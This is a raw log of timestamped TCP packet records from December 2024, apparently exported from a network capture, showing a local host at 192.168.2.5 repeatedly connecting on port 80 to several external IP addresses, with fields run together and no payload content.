                                                            Dec 16, 2024 22:04:15.621550083 CET4999680192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:15.741337061 CET8049996160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:17.132760048 CET4999680192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:17.184637070 CET8049996160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:17.184664965 CET8049996160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:17.184709072 CET8049996160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:17.184712887 CET4999680192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:17.184760094 CET4999680192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:17.184773922 CET4999680192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:17.253380060 CET8049996160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:17.253443003 CET4999680192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:18.156848907 CET4999780192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:18.276647091 CET8049997160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:18.279026031 CET4999780192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:18.293035030 CET4999780192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:18.412997961 CET8049997160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:18.413115025 CET8049997160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:19.804853916 CET4999780192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:19.884227991 CET8049997160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:19.884428978 CET8049997160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:19.884463072 CET8049997160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:19.884994984 CET4999780192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:19.884994984 CET4999780192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:19.884994984 CET4999780192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:19.926703930 CET8049997160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:19.928935051 CET4999780192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:20.834566116 CET4999880192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:20.954571009 CET8049998160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:20.954663992 CET4999880192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:20.967360973 CET4999880192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:21.088784933 CET8049998160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:22.543553114 CET8049998160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:22.543585062 CET8049998160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:22.543662071 CET8049998160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:22.543837070 CET4999880192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:22.543889999 CET4999880192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:22.548844099 CET4999880192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:22.669601917 CET8049998160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:27.948337078 CET4999980192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:28.068160057 CET8049999209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:28.071171999 CET4999980192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:28.082873106 CET4999980192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:28.203699112 CET8049999209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:29.300947905 CET8049999209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:29.301019907 CET8049999209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:29.301075935 CET4999980192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:29.586106062 CET4999980192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:30.604619026 CET5000080192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:30.724462986 CET8050000209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:30.727929115 CET5000080192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:30.745614052 CET5000080192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:30.865674973 CET8050000209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:31.966398954 CET8050000209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:31.966620922 CET8050000209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:31.967144966 CET5000080192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:32.258848906 CET5000080192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:33.285382032 CET5000180192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:33.405699968 CET8050001209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:33.405802011 CET5000180192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:33.424006939 CET5000180192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:33.544368982 CET8050001209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:33.544408083 CET8050001209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:34.699951887 CET8050001209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:34.700021982 CET8050001209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:34.707151890 CET5000180192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:34.929624081 CET5000180192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:35.948817968 CET5000280192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:36.068821907 CET8050002209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:36.068907022 CET5000280192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:36.077868938 CET5000280192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:36.197702885 CET8050002209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:37.299022913 CET8050002209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:37.299348116 CET8050002209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:37.299398899 CET5000280192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:37.302706003 CET5000280192.168.2.5209.74.79.41
                                                            Dec 16, 2024 22:04:37.422576904 CET8050002209.74.79.41192.168.2.5
                                                            Dec 16, 2024 22:04:51.575685978 CET5000380192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:51.695417881 CET8050003202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:51.695502996 CET5000380192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:51.710653067 CET5000380192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:51.830919981 CET8050003202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:53.251081944 CET8050003202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:53.251143932 CET8050003202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:53.251236916 CET5000380192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:53.255094051 CET5000380192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:54.276798964 CET5000480192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:54.396802902 CET8050004202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:54.396954060 CET5000480192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:54.412866116 CET5000480192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:54.532840967 CET8050004202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:55.914940119 CET5000480192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:55.987349987 CET8050004202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:55.987426043 CET8050004202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:55.987675905 CET5000480192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:55.987675905 CET5000480192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:56.037040949 CET8050004202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:56.037127972 CET5000480192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:56.934916973 CET5000580192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:57.055883884 CET8050005202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:57.055969000 CET5000580192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:57.073822021 CET5000580192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:57.194853067 CET8050005202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:57.195888042 CET8050005202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:58.587934017 CET5000580192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:58.708601952 CET8050005202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:58.708931923 CET5000580192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:59.605192900 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:59.728375912 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:04:59.728482008 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:59.744263887 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:04:59.865813971 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.503808022 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.503987074 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.503999949 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.504013062 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.504024982 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.504035950 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.504048109 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.504057884 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.504069090 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.504074097 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.504081011 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.504107952 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.504127979 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.623946905 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.624053955 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.624198914 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.628149033 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.679379940 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.716949940 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.716968060 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.717116117 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.721024036 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.721164942 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.721324921 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.727552891 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.727891922 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.728118896 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.735953093 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.736077070 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.736164093 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.744395971 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.744550943 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.744618893 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.753016949 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.753029108 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.753102064 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.761332035 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.761343956 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.761432886 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.769583941 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.769716024 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.769836903 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.778172016 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.778227091 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.778539896 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.786468029 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.786638975 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.786791086 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.800046921 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.800272942 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.806328058 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.837668896 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.837886095 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.843321085 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.909138918 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.932339907 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.933502913 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.935226917 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.935403109 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.935602903 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.935760975 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.940876007 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.941191912 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.943577051 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.945873022 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.945909023 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.947206020 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.951791048 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.951827049 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.955135107 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.956754923 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.956789970 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.957012892 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.961878061 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.962215900 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.965586901 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.967219114 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.967365026 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.971460104 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.973264933 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.973443031 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.973654985 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.978816986 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.979139090 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.982723951 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.982759953 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.983026981 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.986644030 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.986821890 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.987360001 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.990638018 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.990798950 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.991357088 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.994837999 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.994874954 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.995244026 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:01.998795986 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:01.998950958 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:02.002784967 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:02.002820015 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:02.003169060 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:02.006673098 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:02.006802082 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:02.006947041 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:02.009951115 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:02.010257006 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:02.010392904 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:02.014626980 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:02.015185118 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:02.018903017 CET5000680192.168.2.5202.95.11.110
                                                            Dec 16, 2024 22:05:02.138783932 CET8050006202.95.11.110192.168.2.5
                                                            Dec 16, 2024 22:05:07.566914082 CET5000780192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:07.688385010 CET805000752.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:07.688489914 CET5000780192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:07.705513000 CET5000780192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:07.827023029 CET805000752.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:08.788245916 CET805000752.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:08.788300037 CET805000752.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:08.792876005 CET5000780192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:09.210691929 CET5000780192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:10.232588053 CET5000880192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:10.352643967 CET805000852.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:10.352756977 CET5000880192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:10.368881941 CET5000880192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:10.491601944 CET805000852.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:11.482311010 CET805000852.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:11.482373953 CET805000852.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:11.482422113 CET5000880192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:11.871243954 CET5000880192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:12.895791054 CET5000980192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:13.016004086 CET805000952.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:13.016092062 CET5000980192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:13.033855915 CET5000980192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:13.153660059 CET805000952.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:13.153724909 CET805000952.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:14.115259886 CET805000952.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:14.122256994 CET805000952.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:14.123172045 CET5000980192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:14.538870096 CET5000980192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:15.558520079 CET5001080192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:15.680681944 CET805001052.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:15.680794954 CET5001080192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:15.690947056 CET5001080192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:15.810889006 CET805001052.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:16.785666943 CET805001052.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:16.785689116 CET805001052.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:16.786053896 CET5001080192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:16.788872957 CET5001080192.168.2.552.223.13.41
                                                            Dec 16, 2024 22:05:16.911336899 CET805001052.223.13.41192.168.2.5
                                                            Dec 16, 2024 22:05:22.299798965 CET5001180192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:22.419619083 CET8050011199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:22.420991898 CET5001180192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:22.436933994 CET5001180192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:22.558073044 CET8050011199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:23.519185066 CET8050011199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:23.519233942 CET8050011199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:23.519262075 CET8050011199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:23.519304991 CET5001180192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:23.519334078 CET5001180192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:23.945076942 CET5001180192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:24.965073109 CET5001280192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:25.085047960 CET8050012199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:25.085160971 CET5001280192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:25.107197046 CET5001280192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:25.228502989 CET8050012199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:26.223995924 CET8050012199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:26.224059105 CET8050012199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:26.224102020 CET8050012199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:26.224260092 CET5001280192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:26.619484901 CET5001280192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:27.636226892 CET5001380192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:27.756232023 CET8050013199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:27.756345034 CET5001380192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:27.773008108 CET5001380192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:27.893055916 CET8050013199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:27.893098116 CET8050013199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:28.863082886 CET8050013199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:28.863133907 CET8050013199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:28.863185883 CET8050013199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:28.863199949 CET5001380192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:28.863276005 CET5001380192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:29.288810968 CET5001380192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:30.308906078 CET5001480192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:30.428809881 CET8050014199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:30.429030895 CET5001480192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:30.437952995 CET5001480192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:30.557821989 CET8050014199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:31.538692951 CET8050014199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:31.538803101 CET8050014199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:31.538813114 CET8050014199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:31.538892031 CET5001480192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:31.538921118 CET5001480192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:31.542628050 CET5001480192.168.2.5199.59.243.227
                                                            Dec 16, 2024 22:05:31.662324905 CET8050014199.59.243.227192.168.2.5
                                                            Dec 16, 2024 22:05:37.315882921 CET5001580192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:37.440818071 CET8050015156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:37.440910101 CET5001580192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:37.455231905 CET5001580192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:37.578258038 CET8050015156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:38.960870981 CET5001580192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:38.974565983 CET8050015156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:38.974584103 CET8050015156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:38.974637985 CET5001580192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:38.974674940 CET5001580192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:39.083268881 CET8050015156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:39.083390951 CET5001580192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:39.979768038 CET5001680192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:40.100723028 CET8050016156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:40.103171110 CET5001680192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:40.119111061 CET5001680192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:40.239097118 CET8050016156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:41.632699966 CET5001680192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:41.692372084 CET8050016156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:41.692433119 CET5001680192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:41.692461014 CET8050016156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:41.692507982 CET5001680192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:41.753418922 CET8050016156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:41.753460884 CET5001680192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:42.651674032 CET5001780192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:42.771658897 CET8050017156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:42.775429964 CET5001780192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:42.791152954 CET5001780192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:42.912019014 CET8050017156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:42.912064075 CET8050017156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:44.304559946 CET5001780192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:44.338074923 CET8050017156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:44.338151932 CET8050017156.226.63.13192.168.2.5
                                                            Dec 16, 2024 22:05:44.340969086 CET5001780192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:44.340970039 CET5001780192.168.2.5156.226.63.13
                                                            Dec 16, 2024 22:05:44.426353931 CET8050017156.226.63.13192.168.2.5
